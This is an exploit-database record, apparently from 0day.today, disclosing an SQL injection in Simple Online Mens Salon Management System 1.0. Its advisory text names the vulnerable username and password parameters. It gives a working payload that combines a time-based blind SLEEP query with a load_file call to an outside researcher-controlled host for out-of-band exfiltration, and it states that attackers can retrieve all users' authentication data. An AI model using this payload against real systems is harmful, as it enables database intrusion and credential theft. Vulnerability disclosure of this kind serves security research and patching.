{"id": "1337DAY-ID-37101", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability", "description": "", "published": "2021-12-06T00:00:00", "modified": "2021-12-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/37101", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-07T01:35:57", "viewCount": 205, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/37101", "sourceData": "Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability\n\n## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)\n\n## [Vendor](https://www.sourcecodester.com/users/tips23)\n\n\n\n## Description\nThe `password` parameter on MSMS 1.0 appears to be vulnerable to SQL\ninjection attacks. The predictive tests of this application interacted\nwith that domain, indicating that the injected SQL query was executed.\nThe attacker can retrieve all authentication and\ninformation about the users of this system.\n\n## Payload\n\n```mysql\n---\nParameter: username (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: username=hacked' AND (SELECT 5469 FROM\n(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select\nload_file('\\\\\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\\\maq'))+'\n---\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)\n\n## Proof and Exploit:\n[href](https://streamable.com/fvwqq2)\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646251382}}

{}